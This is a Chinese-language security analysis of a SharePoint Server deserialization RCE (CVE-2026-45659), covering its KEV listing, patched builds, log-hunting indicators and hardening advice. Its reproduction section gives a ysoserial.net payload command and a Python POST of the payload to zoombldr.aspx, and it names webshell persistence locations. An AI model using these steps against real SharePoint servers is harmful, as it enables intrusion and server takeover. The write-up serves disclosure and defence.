SharePoint 反序列化 RCE:CVE-2026-45659 分析
一个普通 Site Member 账户就足以在 SharePoint 服务器上执行任意代码。微软最初判定「利用可能性较低」,CISA 依据在野证据把它拉进了 KEV,并要求三天内完成修复。
概述
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-45659 |
| CVSS | 8.8(High) |
| CWE | CWE-502 不可信数据反序列化 |
| 影响产品 | SharePoint Server 2016 / 2019 / Subscription Edition |
| 修复方式 | 2026 年 5 月安全更新 |
| 披露时间 | 2026-05-21 |
| 利用状态 | 在野利用(CISA KEV + 勒索软件) |
SharePoint Server 是企业内网里部署最广的协作平台之一。这个漏洞允许持有最低限度 Site Member 权限(PR:L)的已认证攻击者在目标服务器上执行任意代码,不需要管理员或其他提升权限。
CISA 在 2026 年 7 月 1 日把它列入已知被利用漏洞(KEV)目录,并要求联邦机构在 7 月 4 日前完成修复——从列入到截止只有三天。这个节奏同时说明了两件事:它在野被积极利用,而且与勒索软件攻击相关。
被怎么发现的
研究人员审计的是 _layouts 目录下特定端点的处理逻辑。_layouts/15/zoombldr.aspx 与 _layouts/15/people.aspx 会接受 POST 请求里的 __SPSCEdit 字段,并对该字段执行反序列化,却没有充分验证被反序列化数据的来源与类型。
这意味着攻击者可以把恶意的序列化负载直接塞进 __SPSCEdit。服务器处理请求时,反序列化会调用攻击者指定的对象类型和构造函数,最终形成任意代码执行。
微软在 2026 年 5 月 21 日发布了安全公告与补丁。但公告里的初始评估把它标为「利用可能性较低」(Exploitation Less Likely);CISA 随后基于实际在野利用的证据将其加入 KEV。两者之间的落差本身就是结论:厂商的初始评估不是最终判断。
复现过程
以下内容仅用于授权安全测试。
实验室需要:Windows Server 2019 或 2022、SharePoint Server 2019(build 低于 16.0.10417.20128)、一个具 Site Member 权限的域用户账户、以及 ysoserial.net。
第一步:生成 .NET 反序列化负载。 用 TypeConfuseDelegate 链配合 BinaryFormatter 格式,输出 Base64:
.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter `
-c "cmd /c whoami" -o base64
第二步:发送利用请求。 把负载放进 __SPSCEdit,连同列表与来源字段一起 POST 到目标端点,使用 Site Member 账户做 NTLM 认证:
data = {
"__SPSCEdit": payload_b64,
"__List": "Documents",
"__Source": f"{target}/Documents/Forms/AllItems.aspx",
}
session.post(f"{target}/_layouts/15/zoombldr.aspx", data=data, auth=(user, pwd))
状态码 200 说明请求被接受,401 是凭据问题,403 则说明权限不足——这个漏洞需要的正是最低档的 Site Member。
第三步:验证与后利用。 命令有回显时直接看响应;没有回显时可用 DNS 外带(例如让目标解析一个带主机名的子域)确认。拿到代码执行后,攻击者的典型动作是往 Web 可访问目录写入 Webshell 维持访问——_layouts、_vti_bin、LAYOUTS/TEMPLATE 是常见落点。
修复方案
安装 2026 年 5 月发布的 SharePoint 安全更新,修复后的内部版本如下:
| 产品版本 | 修复后 Build |
|---|---|
| Subscription Edition | 16.0.19725.20280 |
| Server 2019 | 16.0.10417.20128 |
| Enterprise Server 2016 | 16.0.5552.1002 |
排查重点是 SharePoint 审计日志与 IIS 日志:对 _layouts/15/zoombldr.aspx 与 _layouts/15/people.aspx 的异常 POST、__SPSCEdit 字段的异常使用、Web 可访问目录中出现的异常文件(例如 .aspx Webshell),以及异常的子进程创建事件。
深度防御按最小权限原则展开:严格限制 Site Member 的分配;在网络层限制对管理端点与 _layouts 目录的非必要访问;开启详细审计日志,并部署 EDR 监控可疑的代码执行行为。
总结
这个漏洞的严重性来自低权限利用条件。一个普通的 Site Member 账户,在大多数 SharePoint 环境里就是默认分配给普通员工的级别,却足以在服务器上执行任意代码。一次成功的钓鱼拿到一份普通域用户凭据,就足以成为内网渗透的起点。
微软的「利用可能性较低」与 CISA 将其列入 KEV 并给出三天期限之间的差距,是这份报告里最值得带走的一条经验:漏洞的在野利用动态需要持续跟踪,而不是在公告发布当天就下结论。

评论
…